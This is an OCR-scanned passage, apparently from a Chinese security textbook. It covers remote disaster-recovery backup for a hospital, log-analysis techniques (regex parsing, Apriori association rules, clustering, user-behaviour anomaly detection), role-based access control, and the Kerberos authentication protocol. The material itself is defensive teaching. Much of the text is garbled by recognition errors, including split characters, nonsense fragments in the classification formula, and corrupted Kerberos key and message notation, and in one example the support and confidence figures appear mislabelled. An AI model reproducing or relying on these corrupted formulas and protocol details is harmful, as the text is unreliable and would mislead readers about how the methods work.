意 “ 一 个 三 ”和 “三 个 不 原则 ”， 必 须 备 份 到 300 公里 以 外 ， 并 且 不 能 在 同一 地 震 带 ， 
不 能 在 同 地 电网 ， 不 能 在 同一 江河 流域 。 这 样 即 使 发 生 大 灾 大 难 ， 也 可 以 在 异地 进行 数 
据 回 退 。 当 然 ， 异 地 备份 ， 如 果 想 做 接管 需要 专线 连接 ， 一 般 需要 在 同一 网 段 内 才能 实 
现 业 务 的 接管 。 

当然 ， 最 好 是 能 够 建立 起 “两 地 三 中 心 ” 的 模式 ， 既 做 同城 备份 也 做 异地 备份 ， 这 
样 数据 的 安全 性 会 高 得 多 。 
6.4.3.3 ”网 络 容 灾 备份 系统 的 应 用 

大 型 医院 因为 其 各 方面 因素 ， 常 常 对 数据 容 灾 有 很 高 的 要 求 ， 根 据 国 家 等 级 规范 ， 
可 达到 最 高 层次 的 第 6 级 要 求 。 下 面 以 某 医 院 的 容 灾 架构 图 来 说 明 。 
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在 局 域 网 内 部 署 三 台 备用 服务 器 ， 分 别 是 HIS, PACS 以 及 其 他 业务 系统 的 容 灾 服 
务 器 。 针对 不 同 的 业务 对 RTO, RPO 的 要 求 , HIS 和 PACS 数据 库 服务 器 部 署 镜像 软件 ， 
RIS, LIS, CIS 等 其 他 4 台数 据 库 服务 器 上 分 别 部 署 连续 数据 保护 CDP 软件 ， 实 现 数据 
实时 复制 和 操作 系统 、 文 件 的 定时 备份 。 网 络 拓扑 图 如 图 6-66 所 示 。 
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图 6-66 容 灾 系 统 拓扑 结构 图 


针对 医院 对 各 业务 系统 的 RTO (恢复 时 间 目 标 ) 和 RPO (恢复 点 目标 ) 不 同 ， 选 择 
的 容 灾 软件 也 不 同 ， 比 如 HIS 系统 需要 做 到 7X24 小 时 不 停机 ， 保 证 业务 的 连续 运行 ， 
使 用 镜像 备份 系统 来 满足 它 的 要 求 .对 于 相对 于 HIS 来 说 可 容忍 一 定 的 恢复 时 间 的 系统 。 
比如 LIS 容忍 三 分 钟 的 恢复 时 间 , 这 时 候 , 就 可 以 选择 连续 数据 保护 系统 CDP 满足 其 要 
求 。 这 样 使 用 镜像 备份 软件 和 连续 数据 保护 系统 CDP 来 达到 根据 业务 需求 不 同 达 到 容 
灾 、 容 错 两 大 目的 。 

系统 对 备用 端 服务 器 硬件 和 网 络 等 无 特殊 要 求 ， 可 实现 低 成 本 、 高 保障 的 热 备份 和 
热 容 灾 。 其 支持 主流 的 数据 库 和 文件 备份 以 及 恢复 ， 具 有 全 面 保护 、 安 全 可 靠 、 功 能 强 
大 、 简 单 易 用 等 特点 。 


6.4.4 日 志 分 析 


6.4.4.1 “日 志 分 析 的 基本 原理 
日 志 分 析 就 是 对 有 关 操 作 系统 、 系 统 应 用 或 用 户 活动 所 产生 的 一 系列 的 计算 机 安全 
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事件 进行 记录 和 分 析 的 过 程 。 在 计算 机 系统 中 ， 安 全 管理 员 采 用 日 志 分 析 审计 系统 来 监 
视 系 统 的 状态 和 活动 ， 并 对 日 志文 件 进行 分 析 、 及 时 发 现 系统 中 存在 的 安全 问题 。 

一 个 安全 的 网 络 系统 中 的 日 志 分 析 审 计 系统 ， 是 对 网 络 系统 中 任 一 或 所 有 安全 相关 
事件 进行 记录 、 分 析 和 再 现 的 处 理 系统 。 对 于 日 志 分 析 审 计 系统 的 一 般 要 求 主要 包括 ; 

O 记录 与 再 现 : 要 求 审 计 系统 能 够 记录 系统 中 所 有 的 安全 相关 事件 ， 同 时 ， 如 果 
有 必要 ， 应 该 能 够 再 现 产 生 某 一 系统 状态 的 主要 行为 ; 

@ 入 侵 检测 : 分 析 审 计 系统 应 能 够 检查 出 大 多 数 常见 的 系统 入 侵 的 企图 ， 同 时 ， 
经 过 适当 的 设计 ， 应 该 能 够 阻止 这 些 入 侵 行为 

© 记录 入 侵 行为 :分析 审计 系统 应 该 记录 所 有 的 入 侵 企图 ， 即 使 某 次 入 侵 已 经 成 
功 ， 这 时 候 调查 取证 和 系统 恢复 必 不 可 少 的 

@ 威慑 作用 : 应 该 对 系统 中 具有 的 日 志 分 析 审 计 系 统 及 其 性 能 进行 适当 宣传 ， 这 
样 可 以 对 企图 入 侵 者 起 到 威慑 作用 ,又 可 以 减少 合法 用 户 在 无 意 中 违 反 系统 的 安全 策略 ; 

© 系统 本 身 的 安全 性 : 必须 保证 日 志 分 析 审 计 系统 本 身 的 安全 性 ， 其 中 ， 一 方面 
包括 操作 系统 和 软件 的 安全 性 ， 另 一 方面 包括 分 析 审 计数 据 的 安全 性 ;一 般 来 说 ， 要 保 
证 日 志 分 析 审 计 系统 本 身 的 安全 ， 必 须 与 系统 中 其 他 安全 措施 ， 例 如 认证 、 授 权 、 加 密 
措施 等 相配 合 。 

日 志 分 析 审计 的 功能 包括 ; 

@ 对 潜在 的 攻击 者 起 到 震慑 或 警告 ; 

© 对 于 已 经 发 生 的 系统 破坏 行为 ， 提 供 有 效 的 追 纠 证 据 ; 

@ 为 系统 管理 员 提 供 有 价值 的 系统 使 用 日 志 ， 从 而 帮助 系统 管理 员 及 时 发 现 系 统 
入 侵 行为 或 潜在 的 系统 漏洞 。 

日 志 分 析 审 计 范 围 包括 操作 系统 和 各 种 应 用 程序 。 操 作 系 统 日 志 分 析 审 计 子 系统 的 
主要 目标 是 检测 和 判定 对 系统 的 渗透 及 识别 误 操作 。 其 基本 功能 为 : 分 析 对 象 ( 如 用 户 、 
文件 操作 、 操 作 命 令 等 ) 的 选择 分析 文件 的 定义 与 自动 转换 ， 文 件 系统 完整 性 的 定时 
检测 ;审计 信息 的 格式 和 输出 媒体 ; 逐 出 系统 、 报 警 阀 值 的 设置 与 选择 ;分 析 日 志 记录 
及 其 数据 的 安全 保护 等 。 应 用 程序 分 析 审 计 子 系统 的 重点 是 针对 应 用 程序 的 某 些 操作 作 
为 审计 对 象 进行 监视 和 实时 记录 并 据 记 录 结 果 判 断 此 应 用 程序 是 否 被 修改 和 安全 控制 ， 
是 否 在 发 挥 正确 作用 ; 判断 程序 和 数据 是 否 完整 依靠 使 用 者 身份 、 口 令 验 证 终端 保护 
等 办 法 控制 应 用 程序 的 运行 。 

网 络 日 志 分 析 审 计 一 般 包括 以 下 分 析 审计 事件 : 身份 鉴别 机 制 的 使 用 ;将 客体 引入 
用 户 地 址 空间 ;客体 的 删除 ;操作 员 、 系 统管 理 员 或 《和 ) 系统 安全 管理 员 所 实施 的 动 
Yes 其 他 的 与 安全 相关 的 事件 。 而 每 一 事件 的 分 析 审 计 记 录 项 应 包括 : 事件 的 日 期 与 时 
间 ; 用 户 ; 事件 类 型 ， 事 件 成 功 与 否 ;， 对 于 身份 鉴别 事件 分 析 审 计 记 录 还 应 包括 请 求 的 
来 源 〈 如 ， 终 端 标识 符 ) 。 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ， 分 析 审 
计 记录 还 应 该 包括 客体 的 名 称 和 客体 的 安全 级 别 等 。 
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一 个 日 志 分 析 审 计 系统 的 简单 模型 包括 两 个 部 分 : 日 志 数 据 采 集 器 ， 它 用 于 采集 数 
据 ; 日 志 数据 分 析 器 ， 它 负责 对 分 析 审 计数 据 采集 器 发 送 给 它 的 日 志 数据 进行 分 析 。 通 
常 ， 从 数据 采集 器 向 数据 分 析 器 传送 日 志 数 据 ， 是 由 一 个 文件 来 完成 的 ， 当 从 不 同 的 系 
统 采集 日 志 数据 时 ， 就 会 产生 问题 ， 这 是 对 日 志 分 析 审 计 来 说 ， 缺 少 一 个 标准 的 接口 。 

从 日 志 记 录 中 提取 综合 的 信息 来 形成 查询 是 非常 困难 的 一 件 事 。 在 浏览 日 志 时 ， 可 
以 借助 于 许多 工具 。 在 开发 有 效 的 日 志 分 析 工 具 时 ， 所 遇 到 的 主要 障碍 是 需要 处 理 日 志 
机 制 生成 的 大 量 数 据 。 
6.4.4.2 日 志 分 析 方 法 

日 志 分 析 有 人 工分 析 ， 计 算 机 手动 分 析 、 处 理 审计 记录 并 与 分 析 人 员 最 后 决策 相 结 
合 的 半自动 ， 依 靠 专 家 系统 作出 判断 结果 的 自动 化 的 智能 分 析 等 。 

日 志 分 析 记录 实现 方式 有 如 下 三 种 : 一 是 集中 式 日 志 分 析 。 所 有 多 用 户 操作 系统 都 
有 一 个 统计 软件 ， 用 于 采集 用 户 活动 信息 。 集 中 式 日 志 分 析 可 以 用 其 实现 安全 日 志 分 析 
追踪 ， 但 它 要 么 不 一 定 含有 安全 所 需 的 信息 ， 要 么 其 格式 不 便 使 用 ;二 是 专用 日 志 分 析 
记录 。 它 只 记录 入 侵 检测 系统 所 需 的 分 析 审 计数 据 。 它 可 以 独立 于 各 种 具体 操作 系统 单 
独 运行 ， 便 于 实现 安全 日 志 分 析 ; 三 是 分 布 式 分 析 。 分 布 式 分 析 审 计 允 许 从 网 络 中 的 异 
型 系统 中 采集 日 志 数据 。 这 是 在 网 络 环境 中 保证 安全 性 所 必需 的 。 因 为 在 同一 个 网 络 所 
发 生 的 用 户 活动 相关 性 有 可 能 呈现 出 某 个 恶意 的 行为 ， 而 相同 的 行为 在 单个 主机 层面 上 
可 能 看 起 来 是 合法 的 。 

1， 基 于 正则 表达 式 的 模式 匹配 日 志 分 析 

正则 表达 式 (Regular Expression) 是 一 种 可 以 用 于 模式 匹配 和 替换 的 强 有 力 的 工具 ， 
在 很 多 词法 分 析 的 应 用 中 得 到 了 大 量 的 使 用 。 正 则 表达 式 可 以 让 用 户 通过 一 系列 的 特殊 
字符 构建 匹配 模式 ， 然 后 把 匹配 模式 与 数据 文件 、 程 序 输入 以 及 Web 页 面 的 表单 输入 
等 目标 对 象 进行 比较 ， 根 据 比 较 对 象 中 是 否 包含 匹配 模式 ， 执 行 相应 的 程序 。 它 通常 在 
对 日 志文 件 的 初步 分 析 中 使 用 。 

利用 正则 表达 式 对 日 志 进 行 两 层 解析 的 过 程 如 下 : 

(1) 日 志 的 第 一 层 解 析 主 要 有 以 下 两 个 作用 : 

© 将 日 志 所 包含 的 下 层 信息 的 各 个 字段 区 分 开 , 并 存 入 数据 库 中 ， 如 源 IP 地 址 和 
端口 号 、 目 的 IP 地 址 和 端口 号 、 时 间 、 流 量 等 信息 ; 

@ 解析 结果 作为 第 二 层 解 析 的 输入 ， 第 二 层 解析 根据 各 个 字段 的 具体 值 ， 进 一 步 
调用 相应 规则 进行 解析 。 

(2) 第 一 层 解析 已 经 将 日 志 的 各 个 字段 分 开 ， 第 二 层 解 析 将 根据 cat 字段 区 分 出 日 
志 内 容 的 具体 类 别 ， 然 后 ， 根 据 cat 字段 ， 调 用 相应 的 解析 程序 进行 解析 ， 第 一 层 解 析 
结果 中 的 msg 和 note 字段 是 第 一 层 解析 的 主要 输入 , 这 两 个 字段 包含 了 日 志 更 详细 的 
信息 。 如 入 侵 的 具体 方法 、 登 录用 户 名 等 信息 。 

第 二 层 解 析 后 ， 将 根据 解析 结果 同 数据 库 中 原 有 的 数据 做 比较 ， 并 做 归并 操作 ， 完 
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成 日 志 初步 统计 。 

2. 基于 关联 分 析 的 日 志 分 析 

关联 规则 挖掘 是 数据 挖掘 中 最 活跃 的 研究 方法 之 一 。 给 定 一 个 日 志 数 据 库 ， 关 联 规 
则 挖掘 问题 就 是 通过 用 户 指定 最 小 支持 度 (minsupport) 和 最 小 可 信和 度 (minconfidence) 
来 寻找 合适 关联 规则 的 过 程 。 

一 般 地 ， 关 联 规则 挖掘 问题 可 以 划分 成 两 个 子 问题 : 

(1) 发 现 频繁 项 目 集 

通过 用 户 给 定 的 minsupport, 寻找 所 有 频繁 项 目 集 (Frequent Item set), 即 满足 support 
不 小 于 minsupport 的 项 目 集 。 事 实 上 ， 这 些 频繁 项 目 集 可 能 具有 包含 关系 。 一 般 地 ， 我 
们 只 关心 那些 不 被 其 他 频繁 项 目 集 所 包含 的 所 谓 频 繁 大 项 集 (Frequent Large Item set) 
的 集合 。 这 些 频繁 大 项 集 是 形成 关联 规则 基础 。 

(2) 生成 关联 规则 

通过 用 户 给 定 的 minconfidence， 在 每 个 最 大 频繁 项 目 集中 ， 寻 找 confidence 不 小 于 
minconfidence 的 关联 规则 。 

涉及 两 个 或 两 个 以 上 谓词 的 关联 规则 ， 称 为 多 维 关联 规则 。 在 日 志 的 数据 分 析 中 ， 
由 于 每 次 访问 记录 都 是 多 维 元 组 , 则 需要 使 用 多 维 关联 规则 分 析 维 间 的 隐 含 关系 。 例如 : 
采用 关联 规则 挖掘 主机 日 志 时 ， 发 现 的 规则 之 一 为 

10.30.80.209 80 GET 一 200 (0.3582 0.6560) 

该 规则 表示 主机 日 志 中 35.82% 是 通过 80 端口 IP 为 10.30.80.209 的 用 户 , 通过 GET 
途径 且 访 问 状态 为 200 的 访问 ， 在 该 用 户 通 过 80 端口 GET 途径 的 所 有 访问 中 ， 访 问 状 
态 为 200 的 可 能 性 占 65.60%. 

3. 基于 聚 类 分 析 的 日 志 分 析 

聚 类 分 析 ， 也 叫 分 类 分 析 ， 它 的 基本 思想 是 : 我 们 所 研究 的 样品 之 间 存 在 程度 不 同 
的 相似 性 。 根 据 一 批 样品 的 多 个 观测 指标 ， 上 有 具体 找 出 一 些 能 够 度量 样品 或 指标 之 间 相 似 
程度 的 统计 量 ， 以 这 些 统计 量 为 划分 类 型 的 依据 。 把 一 些 相 似 程度 较 大 的 样品 (或 指标 ) 
聚合 为 一 类 ， 把 另外 一 些 彼 此 之 间 相 似 程度 较 大 的 样品 〈 或 指标 ) 又 聚合 为 另 一 类 ， 直 
到 把 所 有 的 样品 〈 或 指标 ) 聚合 完毕 ， 这 就 是 分 类 的 基本 思想 。 对 于 日 志 分 析 与 审计 来 
说 ， 它 的 功能 是 把 可 疑 数据 映射 到 某 个 给 定 的 类 上 。 分 类 模型 通常 以 ifthen 规则 的 形 
REM. W XY, X={X1, X2, +, Xn HmMAH, Y 表示 类 别 。 

采用 的 基本 方法 是 : 用 一 定数 量 的 样本 〈 称 为 训练 样本 集 ) ， 由 这 些 样本 及 其 已 知 
类 别 ， 给 出 一 套 分 类 判别 准则 ， 使 得 按照 这 套 分 类 判别 准则 ， 对 待 识 别 模式 进行 分 类 使 
错误 识别 率 最 小 。 训 练 完毕 后 ， 对 任何 一 个 样本 ， 都 可 以 利用 分 类 器 将 其 归 到 某 类 中 。 
主要 用 于 预测 类 别 。 
6.4.4.3 “日 志 分 析 应 用 

以 下 是 基于 关联 分 析 方 法 进行 日 志 分 析 的 例子 : 
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通过 典型 的 基于 关联 分 析 的 Apriori 算法 进行 日 志 分 析 得 出 的 是 特征 模式 ,例如 通过 
对 用 户 历史 数据 的 分 析 ， 发 现 如 下 关联 规则 : 

模式 1: username=A, timestamp=am, hostip = 192.168.1.119, userip =192.168.1.201 
(0.98, 0.60] 

模式 2: usemame =A, command=vi, param=.c[0.45, 0.05] 

模式 1 表示 用 户 A 通常 在 每 天 的 上 午 登录 ， 登 录 的 主机 是 192.168.1.119, Brae 
时 的 IP 地 址 是 192.168.1.201。 模 式 2 表示 用 户 A 经 常 执行 vi 命令 ， 执 行 命令 时 所 
使 用 的 参数 通常 是 .c 为 后 级 名 的 文件 。 模 式 后 面 括 号 内 的 分 别 为 置信 和 度 和 支持 度 。 模 式 
1 的 置信 和 度 为 98%， 支 持 度 为 60%; 模式 2 的 置信 度 为 45%， 支 持 度 为 5%。 

如 果 在 Apriori 算法 的 基础 上 加 上 一 个 时 间 约 束 则 是 时 间 序 列 分 析 算 法 ， 它 用 于 分 
析 不 同 审计 记录 之 间 的 相关 性 。 它 的 形式 为 : X，Y 一 Z[C，S，w]，X，Y，Z 为 项 集 ， 
Ww 为 时 间 约 束 。 含义 : 若 X,，Y RE, WE w 秒 内 ，Z 也 发 生 。 

S=Support(XYZ) 是 规则 的 支持 度 : 满足 规则 的 样本 百分比 。 

C=Support(XYZ)/Support(XY) 是 置信 和 度 : 当 X, Y 发 生 时 Z 发 生 的 条 件 概率 。 

除了 时 间 序 列 分 析 以 外 还 有 系统 调用 序列 ， 与 时 间 序 列 分 析 不 同 的 是 它 只 有 一 个 支 
持 度 ， 没 有 时 间 窗 口 的 限制 ， 也 没有 置信 度 。 

例如 ， 通 过 对 用 户 A 所 执行 的 命令 序列 进行 分 析 ， 发 现 如 下 序列 模式 : 

模式 3: command=vi, param=.c—command=gec, param=-g-o—command=gdb(0.4) 

模式 3 表示 用 户 经 常 执行 的 命令 序列 是 : 首先 用 vi 编辑 c 程序 ， 然 后 用 gec 编译 再 
使 用 gdb 进行 程序 的 调试 。 

系统 调用 序列 模式 的 关键 是 模式 的 支持 度 。 对 于 序列 模式 P， 假 设 其 长 度 为 1 MSC 
持 度 计算 公式 为 Support(p)=Np/Ni， 其 中 Np 代表 序列 模式 P 在 审计 记录 集中 出 现 的 次 数 ， 
和 V 代 表 审 计 记 录 集 所 包含 的 所 有 长 度 为 1 的 序列 数 。 上 述 序列 模式 的 支持 度 为 40%。 

依据 以 上 挖掘 出 的 关联 规则 和 序列 模式 ， 可 以 判断 出 用 户 A 应 该 是 一 个 C 程序 员 ， 
其 上 作 时 间 是 每 天 的 上 午 ， 并 且 通 常 从 IP 为 192.168.1.201 的 客户 机 登录 到 IP 为 
192.168.1.119 的 主机 上 进行 编程 操作 。 如 果 在 实际 的 检测 过 程 中 ， 发 现 某 一 天 该 用 户 突 
然 在 晚间 登录 ， 或 者 从 一 个 陌生 的 IP 地 址 登录 到 系统 主机 ， 或 者 在 登录 过 程 中 执行 了 
大 量 与 编程 无 关 的 操作 ， 访 问 主机 的 敏感 口 录 和 文件 ， 则 可 以 推断 出 该 用 户 出 现 了 某 种 
异常 。 这 种 异常 可 能 是 该 用 户 正 在 试图 超越 其 正常 的 操作 权限 ， 也 可 能 是 有 人 冒 用 该 用 
户 的 账号 进行 恶意 的 操作 。 虽 然 异 常 并 不 一 定 意味 着 攻击 行为 ， 但 至 少 应 该 引起 安全 管 
理 员 的 密切 注意 。 

对 DDoS 攻击 的 关联 分 析 : 

输入 : 连接 记录 的 ID 号 ， 即 DDoS RECORD 里 的 DNO. 

输出 : 连接 记录 间 的 关联 关系 。 

对 Finger 攻击 的 关联 分 析 : 
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输入 : 连接 记录 里 各 个 特征 对 应 的 数字 标号 。 

输出 : 连接 记录 内 各 个 特征 属性 的 关联 关系 。 

输入 形式 : 123|145|234|1234|23 (假设 1 2, 3, 4, 5 代表 审计 记录 号 或 
者 特征 号 ) 。 

输出 形式 : 4—5 (30.0%, 100.0%) (30.0% 是 置信 和 度 ，100% 是 支持 度 ) 

4—51 (10.0%, 100.0%) (10.0% 是 置信 和 度 ，100% 是 支持 度 ) 

4—5 (30.0%, 100.0%) 含义 是 : 当 数 字 5 所 代表 的 特征 出 现时 ， 数 字 4 所 代表 的 
特征 出 现 的 概率 是 100%， 这 种 事件 占 整个 事件 的 30.0%。 
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7.1 访问 控制 


7.1.1 访问 控制 技术 


1. 基于 角色 的 访问 控制 设计 

基于 角色 的 访问 控制 (RBAC) 是 实施 面向 企业 安全 策略 的 一 种 有 效 的 访问 控制 方 
式 。 其 基本 思想 是 ， 对 系统 操作 的 各 种 权限 不 是 直接 授予 具体 的 用 户 ， 而 是 在 用 户 集合 
与 权限 集合 之 间 建 立 一 个 角色 集合 。 每 一 种 角色 对 应 一 组 相应 的 权限 。 一 旦 用 户 被 分 配 
了 适当 的 角色 后 ， 该 用 户 就 拥有 此 角色 的 所 有 操作 权限 。 这 样 做 的 好 处 是 ， 不 必 在 每 次 
创建 用 户 时 都 进行 分 配 权限 的 操作 ， 只 要 分 配 用 户 相应 的 角色 即 可 ， 而 且 角 色 的 权限 变 
更 比 用 户 的 权限 变更 要 少 得 多 ， 这 样 将 简化 用 户 的 权限 管理 ， 减 少 系 统 的 开销 。 

2. Kerberos 协议 (Kerberos: Network Authentication Protocol) 

(1) 概述 

在 一 个 开放 的 分 布 式 网 络 环境 中 ， 用 户 通过 工作 站 访问 服务 器 上 提供 的 服务 。 服 务 
器 应 该 能 够 限制 非 授 权 用 户 的 访问 并 能 够 认证 对 服务 的 请 求 。 工 作 站 不 能 够 被 网 络 服务 
所 信任 其 能 够 正确 地 认定 用 户 ， 即 工作 站 存在 三 种 威胁 : 一 个 工作 站 上 一 个 用 户 可 能 冒 
充 另 一 个 用 户 操作 ;一 个 用 户 可 能 改变 一 个 工作 站 的 网 络 地 址 ， 从 而 冒充 另 一 台 工 作 站 
工作 ; 一 个 用 户 可 能 窍 听 他 人 的 信息 交换 ， 并 用 回放 攻击 获得 对 一 个 服务 器 的 访问 权 或 
中 断 服务 器 的 运行 。 

所 有 上 述 问题 可 以 归结 为 一 个 非 授 权 用 户 能 够 获得 其 无 权 访 问 的 服务 或 数据 。 
Kerberos 是 标准 网 络 身份 认证 协议 ， 该 协议 是 由 麻 省 理工 学 院 起 草 ， 采 用 传统 加 密 算法 
〈 无 公 钥 体 制 )， 旨 在 给 计算 机 网 络 提供 “身份 认证 ”。 它 是 基于 信任 第 三 方 ， 如 同一 个 经 
纪 人 集中 地 进行 用 户 认 证 和 发 放电 子 身份 标识 。 它 提供 了 在 开放 型 网 络 中 进行 身份 认证 
的 方法 ， 认 证 实体 可 以 是 用 户 或 用 户 服 务 。 这 种 人 为 不 依赖 宿主 机 的 操作 系统 或 主机 的 
IP 地址 ， 不 需要 保证 网 络 上 所 有 的 物理 安全 性 ， 并 且 假 定数 据 包 在 传输 中 可 被 随机 窃取 
算 改 。 在 用 户 初 始 登 录 成 功 后 ， 其 密 钥 和 身份 标识 信息 会 长 期 保存 在 内 存 中 ， 当 以 后 要 
申请 新 的 票据 《〈 新 的 应 用 服务 ) 时 ， 系 统 会 自动 提取 之 ， 加 密 后 传送 出 去 ， 整 个 过 程 对 
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于 用 户 来 说 完全 是 透明 的 ， 在 不 再 需要 用 户 输入 任何 口令 的 情况 下 实现 用 户 身 份 的 自动 


传递 。 


(2) Kerberos 系统 应 该 满足 的 要 求 : 

D 安全 。 网 络 窍 听 者 不 能 获得 必要 信息 以 假冒 其 他 用 户 ; Kerberos 应 足够 强壮 以 至 
于 潜在 的 攻击 者 无 法 找到 它 的 弱点 连接 。 

@ 可 靠 。Kerberos 应 高 度 可 靠 ， 并 且 应 借助 于 一 个 分 布 式 服务 器 体系 结构 ， 使 得 一 
个 系统 能 够 备份 另 一 个 系统 。 

@ 透明 。 理 想 情 况 下 ， 用 户 除了 要 求 输入 口令 以 外 应 感觉 不 到 认证 的 发 生 。 

@ 可 伸缩 。 系 统 应 能 够 支持 大 数量 的 客户 和 服务 器 。 

(3) 设计 思路 及 问题 

使 用 一 个 (或 一 组 ) 独立 的 认证 服务 器 (Authentication Server，AS)， 来 为 网 络 中 
的 用 户 《C) 提供 身份 认证 服务 ; 认证 服务 器 (AS)， 用 户口 令 由 AS 保存 在 数据 库 中 ; 


AS 与 每 个 服 


Bae V) 共享 一 个 唯一 保密 密 钥 (Kv) (已 被 安全 分 发 )。 


基于 以 上 的 设计 思路 ， 会 出 现 这 样 的 情况 : 观众 想 去 电影 院 看 电影 ， 那 么 就 需要 买 
票 才能 进入 电影 院 。 当 观众 在 电影 院 售票 处 买 票 后 ， 在 电影 院 出 示 票 据 进 入 电影 院 。 问 
题 是 买 的 票 保密 否 ， 是 不 是 谁 拿 到 这 张 票 都 可 以 进入 电影 院 ， 这 张 票 据 能 用 多 久 ， 买 了 
这 张 票 之 后 是 不 是 在 看 电影 的 时 候 都 不 需要 再 买 其 他 的 票 ， 可 以 一 直 使 用 这 张 票据 ;在 
电影 院 买 的 这 张 电影 票 除了 可 以 到 电影 院 1 去 看 电影 能 不 能 去 电影 院 2 看 电影 ? 

上 述 的 协议 问题 就 是 : 口令 明文 传送 会 被 窃听 。 票 据 的 有 效 性 〈 多 次 使 用 )。 访 问 
多 个 服务 器 则 需 多 次 申请 票据 ( 即 口令 多 次 使 用 )。 

解决 上 述 问题 ， Kerberos 协议 使 用 票据 重用 和 引入 票据 许可 服务 器 (Ticket Granting 
Server, TGS). 票据 许可 服务 器 中 分 为 两 种 票据 , 分 别 是 票据 许可 票据 和 服务 许可 票据 。 
票据 许可 票据 是 客户 访问 TGS 服务 器 需要 提供 的 票据 , 目的 是 为 了 申请 某 一 个 应 用 服务 
器 的 服务 许可 票据 ， 它 由 AS 发 放 ， 用 Ticketes 表 示 访 问 TGS 服务 器 的 票据 ， 在 用 户 登 
录 时 向 AS 申请 ， 可 以 多 次 使 用 。 服 务 许 可 票据 是 客户 访问 服务 器 时 需要 提供 的 票据 ， 
用 Tickety 表示 访问 应 用 服务 器 V 的 票据 。 

(4) 原理 

此 模型 中 的 使 用 的 符号 如 下 : 

K。 是 用 户 〈(C) 与 认证 服务 器 (AS) 的 共享 密 钥 。 

Kees 是 认证 服务 器 (AS) 和 票据 许可 服务 器 (TGS) 之 间 的 共享 密 钥 。 

Ky 是 票据 服务 器 (TGS) 和 服务 器 CV) 之 间 的 共享 密 钥 。 

Kets AS 产生 ， 用 户 C 与 TGS 之 间 的 临时 口令 。 

Kev 是 TGS 产生 ， 用 户 C 与 V 之 间 的 临时 口令 。 


Exgs: 使 


用 AS 和 TGS 共享 的 密 钥 Kxes 加 密 


Exe: 使 月 


用 户 和 AS 共享 的 密 钥 Ke 加 密 


Ew: 使 用 TGS 和 V 共享 的 密 钥 ,加密 
Eketgs: 使 用 C 和 TGS 之 间 密 钥 Kctes 加密 


Hp 
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图 7-1 Kerberos 原理 图 


此 模型 的 技术 原理 是 : 采用 对 称 密 钥 加 密 算法 对 信息 进行 加 密 ， 如 果 用 某 个 用 户 的 
密 钥 加 密 某 一 信息 ， 那 么 只 有 该 用 户 才能 解密 。 因 此 ， 通 过 解密 也 可 以 证 明 该 用 户 的 合 
法 性 〈 即 为 密 钥 的 拥有 者 )。Kerberos 协议 中 有 三 个 通信 参与 方 ， 需 要 认证 身份 的 通信 双 
方 和 一 个 双方 都 信任 的 第 三 方 KDC ( 密 钥 分 发 中 心 ), 这 里 需要 注意 的 是 在 KDC 中 有 两 
个 服务 ， 分 别 是 认证 服务 器 CAS) 和 票据 许可 服务 器 (TGS)， 将 发 起 认证 服务 的 一 方 
称 为 客户 方 ， 客 户 方 需要 访问 的 对 象 称 为 服务 器 方 。 在 Kerberos 中 客户 方 是 通过 向 服务 
器 方 递交 自己 的 “票据 ”(Ticket) 来 证 明 自 己 的 身份 的 ， 该 票据 是 由 KDC 专门 为 客户 
方 和 服务 器 方 在 某 一 阶段 内 通信 而 生成 的 。Kerberos 认证 服务 器 KDC 维护 着 一 个 数据 
库 ， 包 括 所 有 用 户 及 应 用 服务 器 的 密 钥 。 用 户 的 密 钥 是 基于 口令 的 ， 只 存在 于 KDC E, 
用 户 首次 注册 时 ， 系 统 根据 用 户 输入 的 口令 经 过 散 列 Hash 可 以 生成 密 钥 ， 应 用 服务 器 
向 KD 注册 时 也 会 生成 密 钥 ， 该 密 钥 不 仅 存 在 于 KDC 上 ， 还 保存 在 该 服务 器 所 储 的 主 
机 上 ， 这 些 密 钥 往 往 是 机 器 随机 生成 。 用 户 与 应 用 服务 器 之 间 进 行 通信 时 ， 二 者 之 间 还 
共享 一 个 临时 会 话 密 钥 ， 可 根据 需要 加 密 数 据 。 该 密 钥 在 KDC 认证 用 户 时 产生 并 分 发 
给 通信 双方 。 会 话 密 钥 仅 在 当前 会 话 期 间 有 效 ， 过 期 需要 重新 申请 。 

(5) 协议 过 程 

在 Kerberos 协议 中 : 用 户 (C) 和 认证 服务 器 (AS) 共享 密 钥 Kc, 认证 服务 器 CAS) 
和 票据 许可 服务 器 (TGS) 共享 密 钥 Kes， 票 据 许 可 服务 器 〈TGS) 和 服务 器 (V) 之 间 
共享 密 钥 Kv， 但 是 用 户 〈C) 和 服务 器 CV) 之 间 没 有 密 钥 共享 ， 因 此 用 户 想 要 访问 服 
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务 器 ， 就 必须 通过 认证 服务 器 〈AS) 和 票据 许可 服务 器 (TGS) 获得 相应 的 密 钥 Kevo 


认证 服务 器 (AS) 票据 许可 服务 
A 器 (TGS) 


{ID ID ,TS ,} Bt Kp ID, ,TS2,LT >, Ticket,,} 


用 户 (C) 


Ticket, =Eve {Kw ,ID.AD.,IDe,TS: LT,} 


图 7-2 第 一 阶段 信息 交换 示意 图 


Kerberos 协议 的 第 一 阶段 : 用 户 〈C) 和 认证 服务 器 CAS) 的 交互 ， 用 户 〈C) 获 
取 票 据 许 可 服务 器 (TGS) 的 票据 许可 票据 Ticketigso 

H (C) 向 AS 发 送 请 求 : IDe: 用 户 (C) 的 标识 ;IDies: 用 户 请 求 访问 TGS; 
TS: WHER, ik AS 验证 用 户 端 时 间 的 有 效 性 ， 以 防止 重 放 攻击 。 

AS 返回 应 答 信息 给 用 户 〈C): 基于 用 户 (C) 和 AS 共享 口令 Ke 的 加 密 ， 使 得 AS 
和 用 户 端 可 以 验证 口令 ， 并 保护 通信 安全 ;Exke: 基于 用 户口 令 的 加 密 ， 使 得 用 户 端 可 以 
验证 口令 ， 以 保护 认证 服务 器 返回 给 客户 端的 信息 ， 用 户 可 用 Ke 解密 ; Ketes: 由 AS 产 
生 ， 是 用 户 与 TGS 之 间 进 行 信息 交换 的 临时 口令 ，IDies: 确认 这 个 票据 是 为 TGS 制作 
的 ; TS WTA; LT: 告知 用 户 该 票据 的 有 效 性 ; Tickettes: 用 户 用 来 访问 TGS 的 票 
据 ， 由 Engs 加密 ， 可 以 重用 ， 从 而 用 户 不 用 重复 被 AS WE. Eng: 使 用 AS 和 TGS 才 
知道 的 密 钥 Kies RINE, BHI ARE. Kag: 用 户 C 和 TGS 之 间 的 会 话 密 钥 。 
IDc: 指明 票据 Ticket 的 正确 主人 。 
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具体 过 程 : 用 户 (C) 将 自己 的 信息 {IDc,IDtes,TS1} 发 送 到 AS 进行 验证 ，AS 验证 用 
